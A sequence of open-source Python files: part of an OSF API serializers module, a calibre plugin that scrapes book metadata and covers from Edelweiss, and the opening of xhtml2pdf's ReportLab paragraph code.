                if isinstance(nested_field, RelationshipField):
                    # if this is a RelationshipField, serialize as a null relationship
                    data['relationships'][field.field_name] = {'data': None}
                else:
                    # otherwise, serialize as an null attribute
                    data['attributes'][field.field_name] = None
            else:
                try:
                    # Querysets and managers expose .all(); evaluate them here
                    # so fields receive concrete iterables.
                    if hasattr(field, 'child_relation'):
                        if hasattr(attribute, 'all'):
                            representation = field.child_relation.to_representation(attribute.all())
                        else:
                            representation = field.child_relation.to_representation(attribute)
                    else:
                        if hasattr(attribute, 'all'):
                            representation = field.to_representation(attribute.all())
                        else:
                            representation = field.to_representation(attribute)
                except SkipField:
                    continue
                if getattr(field, 'json_api_link', False) or getattr(nested_field, 'json_api_link', False):
                    # If embed=field_name is appended to the query string or 'always_embed' flag is True, directly embed the
                    # results in addition to adding a relationship link
                    if embeds and (field.field_name in embeds or getattr(field, 'always_embed', None)):
                        if enable_esi:
                            try:
                                result = field.to_esi_representation(attribute, envelope=envelope)
                            except SkipField:
                                continue
                        else:
                            try:
                                # If a field has an empty representation, it should not be embedded.
                                result = self.context['embed'][field.field_name](obj)
                            except SkipField:
                                result = None
                        if result:
                            data['embeds'][field.field_name] = result
                        else:
                            data['embeds'][field.field_name] = {'error': 'This field is not embeddable.'}
                    try:
                        # Hide certain relationships entirely when viewed
                        # through an anonymous view-only link.
                        if not (
                            is_anonymous and
                            hasattr(field, 'view_name') and
                            field.view_name in self.views_to_hide_if_anonymous
                        ):
                            data['relationships'][field.field_name] = representation
                    except SkipField:
                        continue
                elif field.field_name == 'id':
                    data['id'] = representation
                elif field.field_name == 'links':
                    data['links'] = representation
                else:
                    data['attributes'][field.field_name] = representation
        if not data['relationships']:
            del data['relationships']
        if not data['embeds']:
            del data['embeds']
        if context_envelope:
            ret[context_envelope] = data
            if is_anonymous:
                ret['meta'] = {'anonymous': True}
        else:
            ret = data
        # Merge in any serializer-specific meta information.
        additional_meta = self.get_meta(obj)
        if additional_meta:
            meta_obj = ret.setdefault('meta', {})
            meta_obj.update(additional_meta)
        return ret
    def get_absolute_url(self, obj):
        # Subclasses must provide the canonical API URL for the object.
        raise NotImplementedError()
    def get_meta(self, obj):
        # Hook: subclasses may return a dict merged into the 'meta' section.
        return None
    def get_absolute_html_url(self, obj):
        # Preserve a view_only key from the request, if present, on the HTML URL.
        return utils.extend_querystring_if_key_exists(obj.absolute_url, self.context['request'], 'view_only')
    # overrides Serializer: Add HTML-sanitization similar to that used by APIv1 front-end views
    def is_valid(self, clean_html=True, **kwargs):
        """
        After validation, scrub HTML from validated_data prior to saving (for create and update views)
        Exclude 'type' and '_id' from validated_data.
        """
        ret = super(JSONAPISerializer, self).is_valid(**kwargs)
        if clean_html is True:
            self._validated_data = self.sanitize_data()
        self._validated_data.pop('type', None)
        self._validated_data.pop('target_type', None)
        if self.context['request'].method in utils.UPDATE_METHODS:
            self._validated_data.pop('_id', None)
        return ret
    def sanitize_data(self):
        # Recursively strip HTML from every string in validated_data.
        return functional.rapply(self.validated_data, sanitize.strip_html)
class JSONAPIRelationshipSerializer(BaseAPISerializer):
    """Base Relationship serializer. Requires that a `type_` option is set on `class Meta`.
    Provides a simplified serialization of the relationship, allowing for simple update request
    bodies.
    """
    id = ser.CharField(required=False, allow_null=True)
    type = TypeField(required=False, allow_null=True)
    def to_representation(self, obj):
        request = self.context.get('request')
        type_ = get_meta_type(self, request)
        assert type_ is not None, 'Must define Meta.type_ or Meta.get_type()'
        id_field = self.fields['id']
        relationship = id_field.to_representation(id_field.get_attribute(obj))
        # Render None (rather than an empty resource identifier) when the
        # related id is missing.
        if not relationship:
            return None
        return {'type': type_, 'id': relationship}
def DevOnly(field):
    """Make a field only active in ``DEV_MODE``. ::
        experimental_field = DevMode(CharField(required=False))
    """
    if settings.DEV_MODE:
        return field
    return None
class RestrictedDictSerializer(ser.Serializer):
    """Serializer that renders a flat dict of all readable fields."""
    def to_representation(self, obj):
        data = {}
        readable = (f for f in self.fields.values() if not f.write_only)
        for field in readable:
            try:
                attribute = field.get_attribute(obj)
            except ser.SkipField:
                continue
            # We skip `to_representation` for `None` values so that
            # fields do not have to explicitly deal with that case.
            data[field.field_name] = (
                None if attribute is None else field.to_representation(attribute)
            )
        return data
def relationship_diff(current_items, new_items):
    """
    To be used in POST and PUT/PATCH relationship requests, as, by JSON API specs,
    in update requests, the 'remove' items' relationships would be deleted, and the
    'add' would be added, while for create requests, only the 'add' would be added.
    :param current_items: The current items in the relationship
    :param new_items: The items passed in the request
    :return:
    """
    current_keys = set(current_items)
    new_keys = set(new_items)
    return {
        'add': {k: new_items[k] for k in new_keys - current_keys},
        'remove': {k: current_items[k] for k in current_keys - new_keys},
    }
class AddonAccountSerializer(JSONAPISerializer):
    """Serializer for a user's external (addon) account."""
    id = ser.CharField(source='_id', read_only=True)
    provider = ser.CharField(read_only=True)
    profile_url = ser.CharField(required=False, read_only=True)
    display_name = ser.CharField(required=False, read_only=True)
    # BUG FIX: was ``links = links = LinksField(...)`` -- a duplicated
    # assignment target with no effect beyond the single binding kept here.
    links = LinksField({
        'self': 'get_absolute_url',
    })
    class Meta:
        @staticmethod
        def get_type(request):
            return get_kebab_snake_case_field(request.version, 'external-accounts')
    def get_absolute_url(self, obj):
        """Return the canonical API URL for this external account.

        BUG FIX: an unreachable ``return obj.get_absolute_url()`` that
        followed the return statement has been removed.
        """
        kwargs = self.context['request'].parser_context['kwargs']
        kwargs.update({'account_id': obj._id})
        return utils.absolute_reverse(
            'users:user-external_account-detail',
            kwargs=kwargs,
        )
class LinkedNode(JSONAPIRelationshipSerializer):
    """Relationship body for a node linked to a collection."""
    id = ser.CharField(source='_id', required=False, allow_null=True)
    class Meta:
        @staticmethod
        def get_type(request):
            # The JSON API type was renamed from 'linked_nodes' in API v2.13.
            if StrictVersion(request.version) >= StrictVersion('2.13'):
                return 'nodes'
            return 'linked_nodes'
class LinkedRegistration(JSONAPIRelationshipSerializer):
    """Relationship body for a registration linked to a collection."""
    id = ser.CharField(source='_id', required=False, allow_null=True)
    class Meta:
        @staticmethod
        def get_type(request):
            # Renamed from 'linked_registrations' in API v2.13.
            if StrictVersion(request.version) >= StrictVersion('2.13'):
                return 'registrations'
            return 'linked_registrations'
class LinkedPreprint(LinkedNode):
    """Relationship body for a preprint linked to a collection."""
    class Meta:
        @staticmethod
        def get_type(request):
            # Renamed from 'linked_preprints' in API v2.13.
            if StrictVersion(request.version) >= StrictVersion('2.13'):
                return 'preprints'
            return 'linked_preprints'
class LinkedNodesRelationshipSerializer(BaseAPISerializer):
    """Serializer for the linked-nodes relationship of a collection: computes
    add/remove diffs against the current pointers and applies them."""
    data = ser.ListField(child=LinkedNode())
    links = LinksField({
        'self': 'get_self_url',
        'html': 'get_related_url',
    })
    def get_self_url(self, obj):
        return obj['self'].linked_nodes_self_url
    def get_related_url(self, obj):
        return obj['self'].linked_nodes_related_url
    class Meta:
        @staticmethod
        def get_type(request):
            # JSON API type renamed from 'linked_nodes' in API v2.13.
            if StrictVersion(request.version) < StrictVersion('2.13'):
                return 'linked_nodes'
            return 'nodes'
    def get_pointers_to_add_remove(self, pointers, new_pointers):
        """Return (nodes_to_add, pointers_to_remove) by diffing the current
        pointers against the ids in the request payload.
        :raises exceptions.NotFound: when an id to add does not resolve to a
            node or preprint.
        """
        diff = relationship_diff(
            current_items={pointer._id: pointer for pointer in pointers},
            new_items={val['_id']: val for val in new_pointers},
        )
        nodes_to_add = []
        for node_id in diff['add']:
            # Linked items may be either nodes or preprints.
            node = AbstractNode.load(node_id) or Preprint.load(node_id)
            if not node:
                raise exceptions.NotFound(detail='Node with id "{}" was not found'.format(node_id))
            nodes_to_add.append(node)
        return nodes_to_add, diff['remove'].values()
    def make_instance_obj(self, obj):
        # Convenience method to format instance based on view's get_object
        return {
            'data': [
                pointer for pointer in
                obj.linked_nodes.filter(is_deleted=False, type='osf.node')
            ], 'self': obj,
        }
    def update(self, instance, validated_data):
        """Replace the relationship: remove pointers absent from the payload,
        then add the new ones."""
        collection = instance['self']
        auth = utils.get_user_auth(self.context['request'])
        add, remove = self.get_pointers_to_add_remove(pointers=instance['data'], new_pointers=validated_data['data'])
        for pointer in remove:
            collection.rm_pointer(pointer, auth)
        for node in add:
            try:
                collection.add_pointer(node, auth)
            except ValueError as e:
                raise api_exceptions.InvalidModelValueError(
                    detail=str(e),
                )
        return self.make_instance_obj(collection)
    def create(self, validated_data):
        """POST semantics: only add pointers; a payload that adds nothing is
        rejected as a no-op."""
        instance = self.context['view'].get_object()
        auth = utils.get_user_auth(self.context['request'])
        collection = instance['self']
        add, remove = self.get_pointers_to_add_remove(pointers=instance['data'], new_pointers=validated_data['data'])
        if not len(add):
            raise api_exceptions.RelationshipPostMakesNoChanges
        for node in add:
            try:
                collection.add_pointer(node, auth)
            except ValueError as e:
                raise api_exceptions.InvalidModelValueError(
                    detail=str(e),
                )
        return self.make_instance_obj(collection)
class LinkedRegistrationsRelationshipSerializer(BaseAPISerializer):
    """Serializer for the linked-registrations relationship of a collection.
    Mirrors LinkedNodesRelationshipSerializer but loads AbstractNode only and
    filters pointers to 'osf.registration'."""
    data = ser.ListField(child=LinkedRegistration())
    links = LinksField({
        'self': 'get_self_url',
        'html': 'get_related_url',
    })
    def get_self_url(self, obj):
        return obj['self'].linked_registrations_self_url
    def get_related_url(self, obj):
        return obj['self'].linked_registrations_related_url
    class Meta:
        @staticmethod
        def get_type(request):
            # JSON API type renamed from 'linked_registrations' in API v2.13.
            if StrictVersion(request.version) < StrictVersion('2.13'):
                return 'linked_registrations'
            return 'registrations'
    def get_pointers_to_add_remove(self, pointers, new_pointers):
        """Return (nodes_to_add, pointers_to_remove) by diffing current
        pointers against the ids in the request payload.
        :raises exceptions.NotFound: when an id to add does not resolve.
        """
        diff = relationship_diff(
            current_items={pointer._id: pointer for pointer in pointers},
            new_items={val['_id']: val for val in new_pointers},
        )
        nodes_to_add = []
        for node_id in diff['add']:
            node = AbstractNode.load(node_id)
            if not node:
                raise exceptions.NotFound(detail='Node with id "{}" was not found'.format(node_id))
            nodes_to_add.append(node)
        return nodes_to_add, diff['remove'].values()
    def make_instance_obj(self, obj):
        # Convenience method to format instance based on view's get_object
        return {
            'data': [
                pointer for pointer in
                obj.linked_nodes.filter(is_deleted=False, type='osf.registration')
            ], 'self': obj,
        }
    def update(self, instance, validated_data):
        """Replace the relationship: remove pointers absent from the payload,
        then add the new ones."""
        collection = instance['self']
        auth = utils.get_user_auth(self.context['request'])
        add, remove = self.get_pointers_to_add_remove(pointers=instance['data'], new_pointers=validated_data['data'])
        for pointer in remove:
            collection.rm_pointer(pointer, auth)
        for node in add:
            try:
                collection.add_pointer(node, auth)
            except ValueError as e:
                raise api_exceptions.InvalidModelValueError(
                    detail=str(e),
                )
        return self.make_instance_obj(collection)
    def create(self, validated_data):
        """POST semantics: only add pointers; a payload that adds nothing is
        rejected as a no-op."""
        instance = self.context['view'].get_object()
        auth = utils.get_user_auth(self.context['request'])
        collection = instance['self']
        add, remove = self.get_pointers_to_add_remove(pointers=instance['data'], new_pointers=validated_data['data'])
        if not len(add):
            raise api_exceptions.RelationshipPostMakesNoChanges
        for node in add:
            try:
                collection.add_pointer(node, auth)
            except ValueError as e:
                raise api_exceptions.InvalidModelValueError(
                    detail=str(e),
                )
        return self.make_instance_obj(collection)
class LinkedPreprintsRelationshipSerializer(LinkedNodesRelationshipSerializer):
    """Relationship serializer for preprints linked to a collection."""
    data = ser.ListField(child=LinkedPreprint())
    def get_self_url(self, obj):
        collection = obj['self']
        return collection.linked_preprints_self_url
    def get_related_url(self, obj):
        collection = obj['self']
        return collection.linked_preprints_related_url
    class Meta:
        @staticmethod
        def get_type(request):
            # Renamed from 'linked_preprints' in API v2.13.
            if StrictVersion(request.version) >= StrictVersion('2.13'):
                return 'preprints'
            return 'linked_preprints'
    def make_instance_obj(self, obj):
        # Convenience method to format instance based on view's get_object
        linked = obj.linked_nodes.filter(deleted__isnull=True, type='osf.preprint')
        return {'data': list(linked), 'self': obj}
class MaintenanceStateSerializer(ser.ModelSerializer):
    # Exposes the current maintenance banner (severity level, message, and
    # active window) straight from the MaintenanceState model.
    class Meta:
        model = MaintenanceState
        fields = ('level', 'message', 'start', 'end')
| apache-2.0 |
insomnia-lab/calibre | src/calibre/ebooks/metadata/sources/edelweiss.py | 1 | 15346 | #!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:fdm=marker:ai
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2013, Kovid Goyal <kovid at kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import time, re
from threading import Thread
from Queue import Queue, Empty
from calibre import as_unicode, random_user_agent
from calibre.ebooks.metadata import check_isbn
from calibre.ebooks.metadata.sources.base import Source
def parse_html(raw):
    """Parse possibly-malformed HTML bytes into an lxml element tree root."""
    import html5lib
    from calibre.ebooks.chardet import xml_to_unicode
    from calibre.utils.cleantext import clean_ascii_chars
    # Decode first (assuming utf-8, resolving entities), then drop control
    # characters that would break lxml.
    decoded = xml_to_unicode(
        raw, strip_encoding_pats=True, resolve_entities=True, assume_utf8=True)[0]
    cleaned = clean_ascii_chars(decoded)
    return html5lib.parse(
        cleaned, treebuilder='lxml', namespaceHTMLElements=False).getroot()
def CSSSelect(expr):
    """Compile a CSS selector into a callable lxml XPath matcher."""
    from cssselect import HTMLTranslator
    from lxml.etree import XPath
    xpath_expr = HTMLTranslator().css_to_xpath(expr)
    return XPath(xpath_expr)
def astext(node):
    # Serialize the element's visible text (excluding its tail text) and strip
    # surrounding whitespace. NOTE: relies on the Python 2 ``unicode`` builtin.
    from lxml import etree
    return etree.tostring(node, method='text', encoding=unicode,
            with_tail=False).strip()
class Worker(Thread): # {{{
    """Background worker that downloads one Edelweiss details page, parses it
    into a Metadata object, and puts the result on ``result_queue``."""
    def __init__(self, sku, url, relevance, result_queue, br, timeout, log, plugin):
        Thread.__init__(self)
        self.daemon = True
        self.url, self.br, self.log, self.timeout = url, br, log, timeout
        self.result_queue, self.plugin, self.sku = result_queue, plugin, sku
        self.relevance = relevance
    def run(self):
        # Fetch and parse independently so a parse failure is logged with the
        # right message; errors never propagate out of the thread.
        try:
            raw = self.br.open_novisit(self.url, timeout=self.timeout).read()
        except:
            self.log.exception('Failed to load details page: %r'%self.url)
            return
        try:
            mi = self.parse(raw)
            mi.source_relevance = self.relevance
            self.plugin.clean_downloaded_metadata(mi)
            self.result_queue.put(mi)
        except:
            self.log.exception('Failed to parse details page: %r'%self.url)
    def parse(self, raw):
        """Scrape a product-detail page into a calibre Metadata object.
        Page structure (selectors, banner layout) is specific to the
        Edelweiss site at the time this was written."""
        from calibre.ebooks.metadata.book.base import Metadata
        from calibre.utils.date import parse_only_date, UNDEFINED_DATE
        root = parse_html(raw)
        sku = CSSSelect('div.sku.attGroup')(root)[0]
        info = sku.getparent()
        top = info.getparent().getparent()
        banner = top.find('div')
        spans = banner.findall('span')
        # Title is the first span plus any following spans styled at 12pt
        # (multi-part titles); the last span holds the author list.
        title = ''
        for i, span in enumerate(spans):
            if i == 0 or '12pt' in span.get('style', ''):
                title += astext(span)
            else:
                break
        authors = [re.sub(r'\(.*\)', '', x).strip() for x in astext(spans[-1]).split(',')]
        mi = Metadata(title.strip(), authors)
        # Identifiers
        isbns = [check_isbn(x.strip()) for x in astext(sku).split(',')]
        for isbn in isbns:
            if isbn:
                self.plugin.cache_isbn_to_identifier(isbn, self.sku)
        # Prefer the longest valid ISBN (ISBN-13 over ISBN-10).
        isbns = sorted(isbns, key=lambda x:len(x) if x else 0, reverse=True)
        if isbns and isbns[0]:
            mi.isbn = isbns[0]
        mi.set_identifier('edelweiss', self.sku)
        # Tags
        bisac = CSSSelect('div.bisac.attGroup')(root)
        if bisac:
            bisac = astext(bisac[0])
            mi.tags = [x.strip() for x in bisac.split(',')]
            mi.tags = [t[1:].strip() if t.startswith('&') else t for t in mi.tags]
        # Publisher
        pub = CSSSelect('div.supplier.attGroup')(root)
        if pub:
            pub = astext(pub[0])
            mi.publisher = pub
        # Pubdate
        pub = CSSSelect('div.shipDate.attGroupItem')(root)
        if pub:
            pub = astext(pub[0])
            parts = pub.partition(':')[0::2]
            pub = parts[1] or parts[0]
            try:
                if ', Ship Date:' in pub:
                    pub = pub.partition(', Ship Date:')[0]
                q = parse_only_date(pub, assume_utc=True)
                # NOTE(review): this compares an int year against
                # UNDEFINED_DATE -- confirm against calibre.utils.date whether
                # UNDEFINED_DATE.year was intended here.
                if q.year != UNDEFINED_DATE:
                    mi.pubdate = q
            except:
                self.log.exception('Error parsing published date: %r'%pub)
        # Comments
        comm = ''
        general = CSSSelect('div#pd-general-overview-content')(root)
        if general:
            q = self.render_comments(general[0])
            if q != '<p>No title summary available. </p>':
                comm += q
        general = CSSSelect('div#pd-general-contributor-content')(root)
        if general:
            comm += self.render_comments(general[0])
        general = CSSSelect('div#pd-general-quotes-content')(root)
        if general:
            comm += self.render_comments(general[0])
        if comm:
            mi.comments = comm
        # Cover
        img = CSSSelect('img.title-image[src]')(root)
        if img:
            # Swap the medium-size jacket for the larger 'flyout' variant.
            href = img[0].get('src').replace('jacket_covers/medium/',
                'jacket_covers/flyout/')
            self.plugin.cache_identifier_to_cover_url(self.sku, href)
        mi.has_cover = self.plugin.cached_identifier_to_cover_url(self.sku) is not None
        return mi
    def render_comments(self, desc):
        """Convert a description element into sanitized comment HTML: strip
        scripts, neutralize links, and drop all tag attributes."""
        from lxml import etree
        from calibre.library.comments import sanitize_comments_html
        for c in desc.xpath('descendant::noscript'):
            c.getparent().remove(c)
        for a in desc.xpath('descendant::a[@href]'):
            del a.attrib['href']
            a.tag = 'span'
        desc = etree.tostring(desc, method='html', encoding=unicode).strip()
        # remove all attributes from tags
        desc = re.sub(r'<([a-zA-Z0-9]+)\s[^>]+>', r'<\1>', desc)
        # Collapse whitespace
        # desc = re.sub('\n+', '\n', desc)
        # desc = re.sub(' +', ' ', desc)
        # Remove comments
        desc = re.sub(r'(?s)<!--.*?-->', '', desc)
        return sanitize_comments_html(desc)
# }}}
class Edelweiss(Source):
    """calibre metadata source plugin for the Edelweiss publisher catalog."""
    name = 'Edelweiss'
    description = _('Downloads metadata and covers from Edelweiss - A catalog updated by book publishers')
    capabilities = frozenset(['identify', 'cover'])
    touched_fields = frozenset([
        'title', 'authors', 'tags', 'pubdate', 'comments', 'publisher',
        'identifier:isbn', 'identifier:edelweiss'])
    supports_gzip_transfer_encoding = True
    has_html_comments = True
    @property
    def user_agent(self):
        # Pass in an index to random_user_agent() to test with a particular
        # user agent
        return random_user_agent()
    def _get_book_url(self, sku):
        # Build the product-detail URL for a sku; returns None for a falsy sku.
        if sku:
            return 'http://edelweiss.abovethetreeline.com/ProductDetailPage.aspx?sku=%s'%sku
    def get_book_url(self, identifiers): # {{{
        sku = identifiers.get('edelweiss', None)
        if sku:
            return 'edelweiss', sku, self._get_book_url(sku)
    # }}}
    def get_cached_cover_url(self, identifiers): # {{{
        # Look up the cached cover URL, resolving an ISBN to a sku if needed.
        sku = identifiers.get('edelweiss', None)
        if not sku:
            isbn = identifiers.get('isbn', None)
            if isbn is not None:
                sku = self.cached_isbn_to_identifier(isbn)
        return self.cached_identifier_to_cover_url(sku)
    # }}}
    def create_query(self, log, title=None, authors=None, identifiers={}):
        """Build the Edelweiss browse/search URL, keyed on ISBN when
        available, otherwise on title tokens. Returns None when there is not
        enough metadata to search with."""
        from urllib import urlencode
        BASE_URL = 'http://edelweiss.abovethetreeline.com/Browse.aspx?source=catalog&rg=4187&group=browse&pg=0&'
        params = {
            'browseType':'title', 'startIndex':0, 'savecook':1, 'sord':20, 'secSord':20, 'tertSord':20,
        }
        keywords = []
        isbn = check_isbn(identifiers.get('isbn', None))
        if isbn is not None:
            keywords.append(isbn)
        elif title:
            title_tokens = list(self.get_title_tokens(title))
            if title_tokens:
                keywords.extend(title_tokens)
            # Searching with author names does not work on edelweiss
            # author_tokens = self.get_author_tokens(authors,
            #         only_first_author=True)
            # if author_tokens:
            #     keywords.extend(author_tokens)
        if not keywords:
            return None
        params['bsk'] = (' '.join(keywords)).encode('utf-8')
        return BASE_URL+urlencode(params)
    # }}}
    def identify(self, log, result_queue, abort, title=None, authors=None, # {{{
            identifiers={}, timeout=30):
        """Search Edelweiss and spawn a Worker per candidate (at most 5) to
        fetch full metadata. Returns an error string on failure, else None."""
        from urlparse import parse_qs
        book_url = self._get_book_url(identifiers.get('edelweiss', None))
        br = self.browser
        if book_url:
            # A known sku: go straight to the details page.
            entries = [(book_url, identifiers['edelweiss'])]
        else:
            entries = []
            query = self.create_query(log, title=title, authors=authors,
                    identifiers=identifiers)
            if not query:
                log.error('Insufficient metadata to construct query')
                return
            log('Using query URL:', query)
            try:
                raw = br.open_novisit(query, timeout=timeout).read()
            except Exception as e:
                log.exception('Failed to make identify query: %r'%query)
                return as_unicode(e)
            try:
                root = parse_html(raw)
            except Exception as e:
                log.exception('Failed to parse identify results')
                return as_unicode(e)
            has_isbn = check_isbn(identifiers.get('isbn', None)) is not None
            if not has_isbn:
                author_tokens = set(x.lower() for x in self.get_author_tokens(authors, only_first_author=True))
            for entry in CSSSelect('div.listRow div.listRowMain')(root):
                a = entry.xpath('descendant::a[contains(@href, "sku=") and contains(@href, "productDetailPage.aspx")]')
                if not a:
                    continue
                href = a[0].get('href')
                prefix, qs = href.partition('?')[0::2]
                sku = parse_qs(qs).get('sku', None)
                if sku and sku[0]:
                    sku = sku[0]
                    # Cache any ISBNs listed for this result against its sku.
                    div = CSSSelect('div.sku.attGroup')(entry)
                    if div:
                        text = astext(div[0])
                        isbns = [check_isbn(x.strip()) for x in text.split(',')]
                        for isbn in isbns:
                            if isbn:
                                self.cache_isbn_to_identifier(isbn, sku)
                    for img in entry.xpath('descendant::img[contains(@src, "/jacket_covers/thumbnail/")]'):
                        self.cache_identifier_to_cover_url(sku, img.get('src').replace('/thumbnail/', '/flyout/'))
                    div = CSSSelect('div.format.attGroup')(entry)
                    text = astext(div[0]).lower()
                    if 'audio' in text or 'mp3' in text: # Audio-book, ignore
                        continue
                    if not has_isbn:
                        # edelweiss returns matches based only on title, so we
                        # filter by author manually
                        div = CSSSelect('div.contributor.attGroup')(entry)
                        try:
                            entry_authors = set(self.get_author_tokens([x.strip() for x in astext(div[0]).lower().split(',')]))
                        except IndexError:
                            entry_authors = set()
                        if not entry_authors.issuperset(author_tokens):
                            continue
                    entries.append((self._get_book_url(sku), sku))
        # Nothing found via identifiers: retry once with title/authors only.
        if (not entries and identifiers and title and authors and
                not abort.is_set()):
            return self.identify(log, result_queue, abort, title=title,
                    authors=authors, timeout=timeout)
        if not entries:
            return
        workers = [Worker(sku, url, i, result_queue, br.clone_browser(), timeout, log, self)
                for i, (url, sku) in enumerate(entries[:5])]
        for w in workers:
            w.start()
            # Don't send all requests at the same time
            time.sleep(0.1)
        while not abort.is_set():
            a_worker_is_alive = False
            for w in workers:
                w.join(0.2)
                if abort.is_set():
                    break
                if w.is_alive():
                    a_worker_is_alive = True
            if not a_worker_is_alive:
                break
    # }}}
    def download_cover(self, log, result_queue, abort, # {{{
            title=None, authors=None, identifiers={}, timeout=30, get_best_cover=False):
        """Download the cover image, running identify first when the cover
        URL is not already cached."""
        cached_url = self.get_cached_cover_url(identifiers)
        if cached_url is None:
            log.info('No cached cover found, running identify')
            rq = Queue()
            self.identify(log, rq, abort, title=title, authors=authors,
                    identifiers=identifiers)
            if abort.is_set():
                return
            results = []
            while True:
                try:
                    results.append(rq.get_nowait())
                except Empty:
                    break
            # Use the best-matching result that has a cached cover URL.
            results.sort(key=self.identify_results_keygen(
                title=title, authors=authors, identifiers=identifiers))
            for mi in results:
                cached_url = self.get_cached_cover_url(mi.identifiers)
                if cached_url is not None:
                    break
        if cached_url is None:
            log.info('No cover found')
            return
        if abort.is_set():
            return
        br = self.browser
        log('Downloading cover from:', cached_url)
        try:
            cdata = br.open_novisit(cached_url, timeout=timeout).read()
            result_queue.put((self, cdata))
        except:
            log.exception('Failed to download cover from:', cached_url)
    # }}}
if __name__ == '__main__':
    # Smoke tests for the plugin; running this module directly executes them
    # against the live Edelweiss site.
    from calibre.ebooks.metadata.sources.test import (
        test_identify_plugin, title_test, authors_test, comments_test, pubdate_test)
    tests = [
        ( # A title and author search
            {'title': 'The Husband\'s Secret', 'authors':['Liane Moriarty']},
            [title_test('The Husband\'s Secret', exact=True),
             authors_test(['Liane Moriarty'])]
        ),
        ( # An isbn present in edelweiss
            {'identifiers':{'isbn': '9780312621360'}, },
            [title_test('Flame: A Sky Chasers Novel', exact=True),
             authors_test(['Amy Kathleen Ryan'])]
        ),
        # Multiple authors and two part title and no general description
        ({'identifiers':{'edelweiss':'0321180607'}},
        [title_test(
            "XQuery from the Experts: A Guide to the W3C XML Query Language"
            , exact=True), authors_test([
                'Howard Katz', 'Don Chamberlin', 'Denise Draper', 'Mary Fernandez',
                'Michael Kay', 'Jonathan Robie', 'Michael Rys', 'Jerome Simeon',
                'Jim Tivy', 'Philip Wadler']), pubdate_test(2003, 8, 22),
            comments_test('Jérôme Siméon'), lambda mi: bool(mi.comments and 'No title summary' not in mi.comments)
        ]),
    ]
    # Slice allows quickly limiting which tests run during development.
    start, stop = 0, len(tests)
    tests = tests[start:stop]
    test_identify_plugin(Edelweiss.name, tests)
| gpl-3.0 |
jacobwegner/xhtml2pdf | xhtml2pdf/reportlab_paragraph.py | 60 | 68840 | # -*- coding: utf-8 -*-
# Copyright ReportLab Europe Ltd. 2000-2008
# see license.txt for license details
# history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/platypus/paragraph.py
# Modifications by Dirk Holtwick, 2008
from string import join, whitespace
from operator import truth
from reportlab.pdfbase.pdfmetrics import stringWidth, getAscentDescent
from reportlab.platypus.paraparser import ParaParser
from reportlab.platypus.flowables import Flowable
from reportlab.lib.colors import Color
from reportlab.lib.enums import TA_LEFT, TA_RIGHT, TA_CENTER, TA_JUSTIFY
from reportlab.lib.textsplit import ALL_CANNOT_START
from copy import deepcopy
from reportlab.lib.abag import ABag
import re
PARAGRAPH_DEBUG = False  # set True to trace wrap/split/draw calls on stdout
LEADING_FACTOR = 1.0  # multiplier applied to fontSize when auto-leading is active
# Pre-compiled splitter matching runs of Unicode whitespace.  NO-BREAK SPACE
# (U+00A0) is deliberately excluded (commented out below) so that &nbsp; is
# never treated as a break opportunity; split() only uses this pattern when
# the text actually contains u'\xa0'.
_wsc_re_split=re.compile('[%s]+'% re.escape(''.join((
    u'\u0009',  # HORIZONTAL TABULATION
    u'\u000A',  # LINE FEED
    u'\u000B',  # VERTICAL TABULATION
    u'\u000C',  # FORM FEED
    u'\u000D',  # CARRIAGE RETURN
    u'\u001C',  # FILE SEPARATOR
    u'\u001D',  # GROUP SEPARATOR
    u'\u001E',  # RECORD SEPARATOR
    u'\u001F',  # UNIT SEPARATOR
    u'\u0020',  # SPACE
    u'\u0085',  # NEXT LINE
    #u'\u00A0', # NO-BREAK SPACE (kept unbreakable on purpose)
    u'\u1680',  # OGHAM SPACE MARK
    u'\u2000',  # EN QUAD
    u'\u2001',  # EM QUAD
    u'\u2002',  # EN SPACE
    u'\u2003',  # EM SPACE
    u'\u2004',  # THREE-PER-EM SPACE
    u'\u2005',  # FOUR-PER-EM SPACE
    u'\u2006',  # SIX-PER-EM SPACE
    u'\u2007',  # FIGURE SPACE
    u'\u2008',  # PUNCTUATION SPACE
    u'\u2009',  # THIN SPACE
    u'\u200A',  # HAIR SPACE
    u'\u200B',  # ZERO WIDTH SPACE
    u'\u2028',  # LINE SEPARATOR
    u'\u2029',  # PARAGRAPH SEPARATOR
    u'\u202F',  # NARROW NO-BREAK SPACE
    u'\u205F',  # MEDIUM MATHEMATICAL SPACE
    u'\u3000',  # IDEOGRAPHIC SPACE
    )))).split
def split(text, delim=None):
    """Split *text* on *delim* (default: whitespace) and return a list of
    UTF-8 byte strings.

    Python 2 semantics: str input is decoded to unicode first and results
    are re-encoded.  When no delimiter is given and the text contains a
    NO-BREAK SPACE (u'\\xa0'), the custom _wsc_re_split pattern is used so
    that nbsp is NOT treated as a break opportunity."""
    if type(text) is str:
        text = text.decode('utf8')
    if type(delim) is str:
        delim = delim.decode('utf8')
    elif delim is None and u'\xa0' in text:
        return [uword.encode('utf8') for uword in _wsc_re_split(text)]
    return [uword.encode('utf8') for uword in text.split(delim)]
def strip(text):
    """Strip leading/trailing whitespace, round-tripping through unicode so
    multi-byte UTF-8 input is handled correctly (Python 2 semantics)."""
    if type(text) is str:
        text = text.decode('utf8')
    return text.strip().encode('utf8')
class ParaLines(ABag):
    """
    ParaLines holds the broken-into-lines representation of a Paragraph.

    kind==0 (simple):
        fontName, fontSize, textColor apply to the whole Paragraph
        lines = [(extraSpace1, words1), ..., (extraSpaceN, wordsN)]
    kind==1 (complex, multiple styles per line):
        lines = [FragLine1, ..., FragLineN]
    """
class FragLine(ABag):
    """
    FragLine is a styled line (i.e. a line with more than one style)::

        extraSpace  unused space, needed for justification only
        wordCount   1 + number of spaces in the line, for justification
        words       [ParaFrags] styled text lumps to be concatenated together
        fontSize    maximum fontSize seen on the line; not used at present,
                    but could be used for line spacing.
    """
#our one and only parser
# XXXXX if the parser has any internal state using only one is probably a BAD idea!
# (module-level singleton; _setup() mutates its caseSensitive flag per call)
_parser=ParaParser()
def _lineClean(L):
    # Collapse internal runs of whitespace to single spaces and trim the ends.
    # Uses the module-level split()/strip() plus Python 2's string.join().
    return join(filter(truth,split(strip(L))))
def cleanBlockQuotedText(text,joiner=' '):
    """This is an internal utility which takes triple-
    quoted text form within the document and returns
    (hopefully) the paragraph the user intended originally.

